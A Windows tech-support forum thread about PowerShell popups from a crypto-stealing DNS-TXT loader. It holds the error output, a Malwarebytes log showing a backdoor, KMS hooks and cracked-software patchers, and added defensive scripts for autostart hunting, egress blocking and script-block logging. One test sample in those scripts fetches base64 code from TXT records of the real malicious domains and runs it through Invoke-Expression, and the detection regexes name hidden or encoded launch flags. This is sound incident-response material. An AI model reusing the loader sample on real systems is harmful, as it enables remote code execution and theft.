[SOLVED] Windows terminal pops up sometimes with certain codes on my old laptop (Windows 11), recently installed. Is it a virus or something?

Nov 27, 2022
I have faced this situation many times recently when I start my laptop: these contents pop up in 2 separate PowerShell admin terminals. I got it installed by a friend of mine.

750XXXA1-7XXX-4XXX-9C6C-202XXXFC10B9
Resolve-DnsName : wmail-endpoint.com : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (wmail-endpoint.com:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : bideo-blog.com : DNS server failure
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (bideo-blog.com:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : RCODE_SERVER_FAILURE,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : privatproxy-blog.com : DNS server failure
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (privatproxy-blog.com:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : RCODE_SERVER_FAILURE,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : privatproxy-cdn.com : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (privatproxy-cdn.com:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-chat.com : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (ahoravideo-chat.com:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : fairu-blog.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (fairu-blog.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : fairu-chat.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (fairu-chat.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : fairu-cdn.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (fairu-cdn.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : bideo-blog.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (bideo-blog.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : bideo-schnellvpn.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (bideo-schnellvpn.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : privatproxy-endpoint.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (privatproxy-endpoint.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : privatproxy-chat.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (privatproxy-chat.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-endpoint.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (ahoravideo-endpoint.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-blog.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (ahoravideo-blog.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-chat.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (ahoravideo-chat.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-cdn.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (ahoravideo-cdn.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

AND


32XXX7C1-6XXX-4XXX-A0AX-C8B8XXX58567
Resolve-DnsName : wmail-endpoint.com : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (wmail-endpoint.com:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

[the remaining output of this second terminal is identical to the first one above: the same Resolve-DnsName errors, in the same order, for bideo-blog.com through ahoravideo-cdn.xyz]
Solution
Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 11/27/22
Scan Time: 3:41 PM
Log File: e7bf4dea-6e3b-11ed-ae72-d45d64669f72.json

-Software Information-
Version: 4.5.18.226
Components Version: 1.0.1823
Update Package Version: 1.0.62790
License: Trial

-System Information-
OS: Windows 11 (Build 22621.675)
CPU: x64
File System: NTFS
User: DESKTOP-VN0AQ40\Admin

-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 307216
Threats Detected: 24
Threats Quarantined: 0
Time Elapsed: 9 min, 43 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Warn
PUM: Warn

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 4
RiskWare.IFEOHijack.KMS, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SPPEXTCOMOBJ.EXE, No Action By User, 6280, 1077834, 1.0.62790, , ame, , ,
RiskWare.IFEOHijack.KMS, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\OSPPSVC.EXE, No Action By User, 6280, 1077833, 1.0.62790, , ame, , ,
RiskWare.IFEOHijack.KMS, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SPPEXTCOMOBJ.EXE, No Action By User, 6280, 1077834, 1.0.62790, , ame, , ,
RiskWare.IFEOHijack.KMS, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\OSPPSVC.EXE, No Action By User, 6280, 1077833, 1.0.62790, , ame, , ,

Registry Value: 11
RiskWare.IFEOHijack.KMS, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SPPEXTCOMOBJ.EXE|VERIFIERDLLS, No Action By User, 6280, 1077834, 1.0.62790, , ame, , ,
PUM.Optional.DisableMRT, HKLM\SOFTWARE\WOW6432NODE\POLICIES\MICROSOFT\MRT|DONTOFFERTHROUGHWUAU, No Action By User, 6426, 676880, 1.0.62790, , ame, , ,
PUM.Optional.LowRiskFileTypes, HKU\S-1-5-19\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\ASSOCIATIONS|LOWRISKFILETYPES, No Action By User, 6090, 251589, 1.0.62790, , ame, , ,
RiskWare.IFEOHijack.KMS, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\OSPPSVC.EXE|VERIFIERDLLS, No Action By User, 6280, 1077833, 1.0.62790, , ame, , ,
PUM.Optional.LowRiskFileTypes, HKU\S-1-5-21-816588136-875710598-2891341866-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\ASSOCIATIONS|LOWRISKFILETYPES, No Action By User, 6090, 251589, 1.0.62790, , ame, , ,
Backdoor.Agent.PDL, HKU\S-1-5-21-816588136-875710598-2891341866-1000\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|LOAD, No Action By User, 3815, 233556, 1.0.62790, , ame, , ,
RiskWare.IFEOHijack.KMS, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SPPEXTCOMOBJ.EXE|VERIFIERDLLS, No Action By User, 6280, 1077834, 1.0.62790, , ame, , ,
PUM.Optional.DisableMRT, HKLM\SOFTWARE\POLICIES\MICROSOFT\MRT|DONTOFFERTHROUGHWUAU, No Action By User, 6426, 676880, 1.0.62790, , ame, , ,
PUM.Optional.LowRiskFileTypes, HKU\S-1-5-20\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\ASSOCIATIONS|LOWRISKFILETYPES, No Action By User, 6090, 251589, 1.0.62790, , ame, , ,
RiskWare.IFEOHijack.KMS, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\OSPPSVC.EXE|VERIFIERDLLS, No Action By User, 6280, 1077833, 1.0.62790, , ame, , ,
Adware.SearchEngineHijack, HKU\S-1-5-21-816588136-875710598-2891341866-1000\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Profile 1\extensions.settings|lokjgaehpcnlmkebpmjiofccpklbmoci, No Action By User, 391, 460702, , , , , ,

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 1
Adware.SearchEngineHijack, C:\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\LOKJGAEHPCNLMKEBPMJIOFCCPKLBMOCI, No Action By User, 391, 460702, 1.0.62790, , ame, , ,

File: 8
Adware.SearchEngineHijack, C:\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Profile 1\Secure Preferences, No Action By User, 391, 460702, , , , , 18CB3AAB3AFFE00B67BAFBA4D4EFB3A2, 6AFCC824899A029C622167819134EA84F6879767D7E7B997500256CD399DB6B1
Adware.SearchEngineHijack, C:\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Profile 1\Preferences, No Action By User, 391, 460702, , , , , F1AFBA59A6122C4FAED6C2066237E054, 86670387C897D36BF6BAF080E88AAA3F85A254D3B0E89103FABF7D9B7E98E023
Adware.SearchEngineHijack, C:\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\LOKJGAEHPCNLMKEBPMJIOFCCPKLBMOCI\2.18.3_0\MANIFEST.JSON, No Action By User, 391, 460702, 1.0.62790, , ame, , F4791B424E7144FE43B242934A18D801, 7B72CF6A42F0E8BBCEE5EDC63EE3613FD86A1D8E30E610CE1A049F9E63EDC228
Malware.Heuristic.1008, C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\TEMP2_PHOENIX LITEOS FLICKER FIXER V2.ZIP\PHOENIX LITEOS FLICKER FIXER\PHOENIX LITEOS FLICKER FIXER.EXE, No Action By User, 1000001, 0, 1.0.62790, 0000000000000000000003F0, dds, 02051524, 4BD3884A01F3A2DDD6C603C3A8A38B85, 5C41F59F080F3F7D5BACFA8BD74DAB9D308E9C5B4B2BB84F4D75FA3ADC334FEF
Malware.Heuristic.1008, C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\TEMP1_PHOENIX LITEOS FLICKER FIXER V2.ZIP\PHOENIX LITEOS FLICKER FIXER\PHOENIX LITEOS FLICKER FIXER.EXE, No Action By User, 1000001, 0, 1.0.62790, 0000000000000000000003F0, dds, 02051524, 4BD3884A01F3A2DDD6C603C3A8A38B85, 5C41F59F080F3F7D5BACFA8BD74DAB9D308E9C5B4B2BB84F4D75FA3ADC334FEF
Malware.AI.4051675685, C:\PROGRAMDATA\PHOENIXOS\0PTIONAL\ENABLE VIRTUAL MEMORY (RECOMMENDED!)\VIRTUAL MEMORY ENABLER.EXE, No Action By User, 1000000, -243291611, 1.0.62790, 8D3AB83E192AFBA8F17FAA25, dds, 02051524, 261B401323B32E3A0123A5E0B242DFAA, 02239C6E0236C99809EB60B8B38C46F115CC51019C6CBC1EB75D5CBCEA00F894
Generic.Malware/Suspicious, C:\PROGRAM FILES\IDM COMPUTER SOLUTIONS\ULTRAEDIT\IDM_UNIVERSAL_PATCH_V6.0_BY_DFOX.EXE, No Action By User, 0, 392686, 1.0.62790, , shuriken, , 042D3096173B754B931ED802DD976089, A5AF3175F6DFAC2BEDB8DC6EA06060EEEE93204343FBE17C2E117C619F4BA3A8
HackTool.FilePatch, C:\PROGRAM FILES (X86)\STARDOCK\FENCES\STARDOCK.FENCES.3.0.5.X64-PATCH.EXE, No Action By User, 7035, 281135, 1.0.62790, , ame, , A83C862CE356CE27AA1BCAD439DE71AC, 5405E5C8A154F6219C933DBA05EF3CA2D1162E666CD36B183BA8580F209C898E

Physical Sector: 0
(No malicious items detected)

WMI: 0
(No malicious items detected)


(end)
Have you run anything like Malwarebytes or Bitdefender Free?

That would be my 1st move.

Someone else with the same files - similar links:

https://www.pluribus-one.it/company/blog/84-cybersecurity/150-detecting-powershell-cryptostealer

It's a crypto-stealing virus - https://answers.microsoft.com/en-us...k-jojlns/131793d9-6844-41e4-8397-68a7576ec5d5

Looks like the network it's trying to contact got taken down. It can't reach its payload.
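Putting the two posts together (added commentary and example, not part of the thread): the popup is the error stream of a script whose line 9 runs Resolve-DnsName -Name $hostname -Type 'TXT' over a list of hostnames, that is, a loader expecting its next stage in DNS TXT records, and every lookup fails with NXDOMAIN ("DNS name does not exist") or SERVFAIL ("DNS server failure") because the domains are gone. The Malwarebytes log places the flagged autostart (Backdoor.Agent.PDL) in the Load value of HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows, a legacy logon-time launcher, next to IFEO VerifierDlls entries, which make Windows load the named DLL into the listed activation processes at start. The PowerShell below is example code written for this page, not code from the thread, from Malwarebytes or from the malware: it enumerates those launch points plus the other usual PowerShell launchers (Run/RunOnce, scheduled tasks, WMI event consumers), reads any .ps1 an entry references, and tests the text for the loader shape. The indicator regexes, the hostname-count threshold and the two sample scripts are constructed assumptions for the demonstration, not signatures.

```powershell
# Added example, not code from the thread, from Malwarebytes or from the malware itself.
# The popup is a loader doing Resolve-DnsName -Type TXT over a hostname list; the Malwarebytes log
# shows its autostart in the HKCU ...\Windows NT\CurrentVersion\Windows\Load value plus IFEO hooks.
# Below: enumerate those launch points, pull in any referenced .ps1, test the text for the loader
# shape. Regexes, thresholds and the two samples are assumptions made for the demonstration.

# Indicator groups: a TXT lookup, a way to execute what it returns, launcher flags that hide it.
$LoaderIndicators = @{
    DnsTxtLookup = 'Resolve-DnsName\s+.*-Type\s+[''"]?TXT'
    Execution    = 'Invoke-Expression|\biex\b|FromBase64String|\[scriptblock\]::Create'
    Stealth      = '-(w|win|windowstyle)\s+hidden|-e(c|nc|ncodedcommand)\s+[A-Za-z0-9+/=]{16,}|-nop\b|-e(p|xecutionpolicy)\s+bypass'
}

function Test-DnsTxtLoader {
    # Scores one script text or command line. Suspicious needs the TXT lookup plus either
    # several hostnames or an execution primitive, so a lone SPF/DKIM check stays benign.
    param([Parameter(Mandatory)][string]$Text, [string]$Source = '<inline>')
    $hits = @(foreach ($k in $LoaderIndicators.Keys) { if ($Text -match $LoaderIndicators[$k]) { $k } })
    $hostCount = [regex]::Matches($Text, '\b[a-z0-9-]+\.(com|net|org|xyz|top|site)\b', 'IgnoreCase').Count
    [pscustomobject]@{
        Source     = $Source
        Indicators = ($hits | Sort-Object) -join ','
        Hostnames  = $hostCount
        Suspicious = ($hits -contains 'DnsTxtLookup') -and ($hostCount -ge 2 -or $hits -contains 'Execution')
    }
}

function Get-AutostartCommands {
    # Launch points worth reading on this machine: the Load/Run values, the IFEO keys the log
    # flagged (Debugger replaces the image, VerifierDlls injects into it), tasks, WMI consumers.
    $runKeys = @(
        'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows'   # holds the Load and Run values
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    foreach ($key in $runKeys) {
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # provider noise: PSPath, PSParentPath, ...
            [pscustomobject]@{ Source = "$key\$($p.Name)"; Command = [string]$p.Value }
        }
    }
    $ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',
            'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
    foreach ($root in $ifeo) {
        foreach ($sub in Get-ChildItem -Path $root -ErrorAction SilentlyContinue) {
            $v = Get-ItemProperty -Path $sub.PSPath
            foreach ($name in 'Debugger', 'VerifierDlls') {
                if ($v.$name) { [pscustomobject]@{ Source = "IFEO:$($sub.PSChildName)\$name"; Command = [string]$v.$name } }
            }
        }
    }
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($a in $task.Actions) {
            if ($a.Execute) { [pscustomobject]@{ Source = "Task:$($task.TaskPath)$($task.TaskName)"; Command = "$($a.Execute) $($a.Arguments)" } }
        }
    }
    Get-CimInstance -Namespace root\subscription -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue |
        ForEach-Object { [pscustomobject]@{ Source = "WMI:$($_.Name)"; Command = [string]$_.CommandLineTemplate } }
}

# 1) Self-check of the heuristic on two constructed samples (not taken from the infected machine).
$samples = [ordered]@{
    'benign SPF lookup' = 'Resolve-DnsName -Name example.com -Type TXT | Select-Object -ExpandProperty Strings'
    'loader shape'      = @'
$hosts = 'wmail-endpoint.com', 'bideo-blog.com', 'privatproxy-blog.com'
foreach ($hostname in $hosts) {
    $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
    if ($dns) { Invoke-Expression ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(($dns.Strings -join '')))) }
}
'@
}
$samples.GetEnumerator() | ForEach-Object { Test-DnsTxtLoader -Text $_.Value -Source $_.Key } | Format-Table -AutoSize -Wrap

# 2) Live hunt: every launch point that invokes PowerShell (and the Load value regardless),
#    with any referenced .ps1 read in so the check sees the script body, not just the launcher.
Get-AutostartCommands | Where-Object { $_.Command -match 'powershell|pwsh|\.ps1' -or $_.Source -like '*\Windows\Load' } | ForEach-Object {
    $text = $_.Command
    if ($text -match '([A-Za-z]:\\[^"'' ]+\.ps1)' -and (Test-Path -LiteralPath $Matches[1])) {
        $text += "`n" + (Get-Content -LiteralPath $Matches[1] -Raw)
    }
    Test-DnsTxtLoader -Text $text -Source $_.Source
} | Format-Table -AutoSize -Wrap
```

Run it elevated so the HKLM IFEO keys, every scheduled task and the root\subscription namespace are readable. The self-check should report the SPF lookup as not suspicious (one hostname, nothing executed) and the loader shape as suspicious with three hostnames; only then is the live output worth reading. Anything at all in the Load value deserves a look, because current software almost never sets it, and when a Load or Run entry points at a .bat or .vbs wrapper rather than at powershell.exe directly, open the wrapper and test its contents with Test-DnsTxtLoader too.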
 
I installed a firewall, and all I noticed is a connection from PowerShell to cesar europe.com, which seems to download a suspicious binary file, but it was blocked thanks to the fact that I had a setting for the device to ask for the save location before downloading.
 
Bro, do you know how we can find this file? It has failed due to the taken-down domains, but I would rather get rid of this forever. The problem is that it doesn't even register as a positive on VirusTotal.
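To the question above, and to the firewall observation two posts up, a responder's answer is to contain first and then let the loader identify itself on its next run. The PowerShell below is example code written for this page, not code from the thread: it adds outbound block rules for both Windows PowerShell host binaries, so that even if one of those domains came back (or a download like the one the firewall caught were attempted again) nothing could be fetched; it enables PowerShell script block logging through the same policy registry key Group Policy uses; and, after the next popup, it reads Event ID 4104 from the Microsoft-Windows-PowerShell/Operational log and returns the recorded script text and on-disk path of every block that issued a TXT lookup. That is how you find the file when nothing flags on VirusTotal: the loader is plain script text, the popup already shows it is at least nine lines long ("At line:9"), and the engine logs the text itself. The rule names, the MaxEvents default and the regex are assumptions.

```powershell
# Added example, not code from the thread. Containment and capture for the loader in the first
# post, to run before the next reboot: deny both Windows PowerShell hosts outbound access, turn on
# script block logging, then after the next popup read Event ID 4104 to get the script text and
# the path of whatever issued the TXT lookups. Rule names, limits and the regex are assumptions.
# Run elevated.

$PsHosts = @(
    "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"
    "$env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
)

function Block-PowerShellEgress {
    # One outbound block rule per host binary; re-running does not create duplicates.
    foreach ($exe in $PsHosts) {
        $name = "IR block outbound: $exe"
        if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
            New-NetFirewallRule -DisplayName $name -Direction Outbound -Program $exe `
                -Action Block -Profile Any -Enabled True | Out-Null
        }
        $name
    }
}

function Enable-ScriptBlockLogging {
    # Same registry value the "Turn on PowerShell Script Block Logging" policy writes.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
    (Get-ItemProperty -Path $key).EnableScriptBlockLogging -eq 1
}

function Get-LoaderScriptPaths {
    # Every logged script block whose text contains a TXT lookup, newest first, with the path the
    # engine recorded (empty when the code arrived via -Command, -EncodedCommand or piped input).
    param([string]$Pattern = 'Resolve-DnsName\s+.*-Type\s+[''"]?TXT', [int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
    ForEach-Object {
        # 4104 payload: [0] MessageNumber [1] MessageTotal [2] ScriptBlockText [3] ScriptBlockId [4] Path
        $text = [string]$_.Properties[2].Value
        if ($text -notmatch $Pattern) { return }
        $path = [string]$_.Properties[4].Value
        if (-not $path) { $path = '<no file: -Command, -EncodedCommand or piped input>' }
        $line = [string]($text -split "`r?`n" | Where-Object { $_ -match $Pattern } | Select-Object -First 1)
        [pscustomobject]@{ Time = $_.TimeCreated; Path = $path; ScriptBlockId = $_.Properties[3].Value; Line = $line.Trim() }
    } | Sort-Object Time -Descending
}

Block-PowerShellEgress
Enable-ScriptBlockLogging
# ...then, after the next logon or popup:
Get-LoaderScriptPaths | Format-Table -AutoSize -Wrap
```

Two caveats. Blocking powershell.exe outbound also breaks legitimate PowerShell networking on that machine (Install-Module, Update-Help, remoting initiated from it) until the rules are removed with Remove-NetFirewallRule -DisplayName 'IR block outbound: *'. And if Path comes back empty, the script reached the engine as an inline command, so the launcher is whichever autostart entry invoked powershell.exe; the script text is still in the event. More broadly, the Malwarebytes log above lists, besides the loader, files from a Phoenix LiteOS (modified Windows) build, a KMS activation hook in the IFEO keys, and patchers for UltraEdit and Stardock Fences. A machine set up from a modified Windows image with cracked software has no trustworthy baseline, so the dependable fix is a clean reinstall from Microsoft media rather than quarantining these entries one at a time.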
 